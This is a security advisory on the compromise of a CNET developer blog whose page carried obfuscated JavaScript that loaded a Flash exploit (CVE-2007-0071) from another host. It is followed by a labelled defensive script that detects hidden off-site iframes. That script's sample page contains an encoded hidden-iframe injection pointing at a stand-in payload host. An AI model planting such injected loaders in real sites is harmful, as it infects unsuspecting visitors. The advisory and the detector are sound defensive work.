Malicious JavaScript Code In Another CNET Networks Website
Websense has discovered that another CNET Networks site, CNET Clientside Developer Blog, has been compromised, just 5 months after the previous incident. The main page of this website contains malicious JavaScript code that de-obfuscates into an iframe that loads its primary malicious payload from a different host. This malicious JavaScript code attempts to access the live exploit URL from a .info domain that is now down.
The malicious code is observed to exploit a known integer overflow vulnerability in Adobe Flash (CVE-2007-0071). At the time of this alert, the site is still hosting the malicious code. Visitors who are not patched against this vulnerability will be infected without any user interaction.
The Clientside developer blog has been embedded with malicious JavaScript code that attempts to exploit visitors through a well-known vulnerability in Adobe Flash Player. Software vulnerable to this attack includes Adobe Flash Player version 9.0.115.0 and earlier, Adobe Flex 3.0, and Adobe AIR 1.0.
This malware attack is not an isolated event. Lately, attacks in which legitimate sites serve malware and exploits have become very popular. Multiple vendors are confirming this trend: in its latest report, ScanSafe found a 407 percent increase in compromises of legitimate websites; according to Sophos, 79 percent of malware-hosting Web sites are legitimate ones; and according to Websense, more than 75 percent of the Web sites classified as malicious were actually legitimate ones. These studies show that the old security advice “stay away from unknown websites” will soon become irrelevant.
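For site owners checking their own pages for this pattern (inline script that decodes into an iframe pointing at a different host), the following added example shows a static check; it is not code from the Websense alert. It assumes the obfuscation is percent-encoding inside a script string, which the alert does not specify, and the sample page, function names and `.example` hosts are constructed for illustration.

```javascript
// Added example, not code from the alert. Assumption: the obfuscation is
// percent-encoding inside a script string; the alert does not say which was used.

// Constructed sample page; all hosts use the reserved .example TLD.
const SAMPLE_PAGE = `
<html><body>
<iframe src="/widgets/poll.html"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//payload-host.example/x/%22%20width%3D0%20height%3D0%3E%3C/iframe%3E'));</script>
</body></html>`;

// Percent-decode repeatedly (bounded) so nested encoding layers are unwrapped.
function decodeLayers(text, maxRounds = 3) {
  let current = text;
  for (let i = 0; i < maxRounds; i++) {
    const next = current.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
      (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
    if (next === current) break;
    current = next;
  }
  return current;
}

// Report every iframe whose src resolves to a host other than the page's own.
function findOffsiteIframes(html, pageUrl) {
  const pageHost = new URL(pageUrl).hostname;
  // View 1: markup as served, scripts removed. Further views: each inline script, decoded.
  const views = [{ origin: "markup", text: html.replace(/<script[\s\S]*?<\/script>/gi, "") }];
  for (const m of html.matchAll(/<script[^>]*>([\s\S]*?)<\/script>/gi)) {
    views.push({ origin: "script (decoded)", text: decodeLayers(m[1]) });
  }
  const findings = [];
  for (const { origin, text } of views) {
    for (const [tag] of text.matchAll(/<iframe\b[^>]*>/gi)) {
      const src = /\ssrc\s*=\s*["']?([^"'\s>]+)/i.exec(tag);
      if (!src) continue;
      let host;
      try { host = new URL(src[1], pageUrl).hostname; } catch { continue; }
      if (host === pageHost) continue;
      // Zero-sized or hidden frames are the usual sign of an injected loader.
      const hidden = /\b(width|height)\s*=\s*["']?0\b|display\s*:\s*none/i.test(tag);
      findings.push({ origin, host, src: src[1], hidden });
    }
  }
  return findings;
}

console.log(findOffsiteIframes(SAMPLE_PAGE, "http://blog.example/"));
```

A static check like this only catches encodings it knows how to unwrap; comparing the rendered DOM against an allow-list of expected frame hosts covers scripts that build the iframe in other ways.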